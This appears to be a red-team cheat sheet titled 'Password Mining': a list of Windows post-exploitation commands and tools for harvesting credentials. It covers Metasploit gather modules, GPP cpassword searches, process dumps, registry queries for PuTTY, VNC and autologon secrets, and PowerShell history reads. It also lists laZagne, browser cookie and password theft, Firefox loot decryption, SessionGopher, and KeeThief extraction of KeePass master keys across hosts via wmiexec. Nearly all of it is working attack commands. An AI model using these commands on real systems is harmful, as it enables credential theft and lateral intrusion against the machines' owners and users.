Skip to main content

Password Mining

Metasploit​

run post/windows/gather/credentials/credential_collector
clipboard_get_data (extapi)

Clipboard​

Get-clipboard
cmdkey /list
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si <passw> *.xml *.ini *.txt *.vbs *.cmd *.ps1 *.bat *.inf *.eml

Sysprep / GPP​

C:\sysprep.inf
C:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend
%WINDIR%\Panther
%WINDIR%\System32\Sysprep
scanner/smb/smb_enum_gpp
findstr /S cpassword %logonserver%\sysvol\*.xml
Get-GPPPasswords.ps1
post/windows/gather/credentials/gpp

Process dump​

procdump.exe -accepteula -ma <process_name/pid> <out.dmp>
strings <out.dmp>
Out-minidump (Get-Process -Id <pid>)

Invoke-mimikittenz.ps1

Registry​

Get-ItemProperty <registry_key>
reg query <registry_key>
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
reg query HKCU\software\microsoft\windows\currentversion\explorer\runmru
reg query HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
reg query HKLM\SYSTEM\Current\ControlSet\Services\SNMP
reg query HKCU\Software\SimonTatham\PuTTY\Sessions
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
reg query HKCU\Software\TightVNC\Server
reg query HKLM /f passw /t REG_SZ /s
reg query HKCU /f passw /t REG_SZ /s

AutoLogon​

Get-RegistryAutoLogon

post/windows/gather/credentials/windows_autologin

Config files (PowerUp)​

Get-SiteListPassword
Get-WebConfig

Powershell​

type C:\Users\<user>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw

laZagne​

laZagne.exe all

Browsers passwords​

SharpWeb.exe all

Chrome passwords and cookies​

tip

In all cases, Chrome must be shutdown when you collect clear text passwords. Must be run with the context of the targeted user.

CookieMonster​

CookieMonster creds
CookieMonster.exe cookies [-d <domain>] -e
CookieMonster -a
Attachment

CookieMonster.exe

Firefox passwords​

post/multi/gather/firefox_creds
mkdir 61f7vbl2.default
cd 61f7vbl2.default
mv /root/.msf4/loot/20190808160816_default_172.16.1.5_ff.61f7vbl2.cert_864640.bin cert9.db
mv /root/.msf4/loot/20190808160827_default_172.16.1.5_ff.61f7vbl2.cook_132753.bin cookies.sqlite
mv /root/.msf4/loot/20190808160840_default_172.16.1.5_ff.61f7vbl2.key4_423309.bin key4.db 
/opt/firefox_decrypt/firefox_decrypt.py ../61f7vbl2.default/

Remote Access tools​

WinSCP, PuTTY, SuperPuTTY, FileZilla, and Microsoft Remote Desktop

Invoke-SessionGopher -Thorough

Invoke-SessionGopher -AllDomain [-u <domain>\<user>] [-p <password>]
Invoke-SessionGopher -iL <computerlist.txt> [-u <domain>\<user>] [-p <password>]

Invoke-SessionGopher -Target <computername> -Thorough

Keepass​

info

Works when KeePass is running and the database is unlocked. Does not need administrator privileges.

Ressources

Detect Keepass

tasklist | findstr /I keepass
Get-Process keepass

List workstations with keepass from a RCE (WMI)

for ip in $(cat <list_ip.txt>); do wmiexec.py <username>:<password>@$ip 'tasklist | findstr /I keepass' | grep -i keepass 1>/dev/null && echo "[+] Found KeePass process on $ip"; done

Attack​

Powershell

Import-Module KeeThief.ps1
Get-KeePassDatabaseKey -Verbose

Copy both files in the same directory on the target workstation and run the binary file.

Attachments

KeeTheft.exe

Microsoft.Diagnostics.Runtime.dll

tip

If Keepass needs a key file or windows user account or both: use KeePatched.exe.

mRemoteNG parser​

info

The script mRemoteNG_parser.py takes confConfs.xml as input.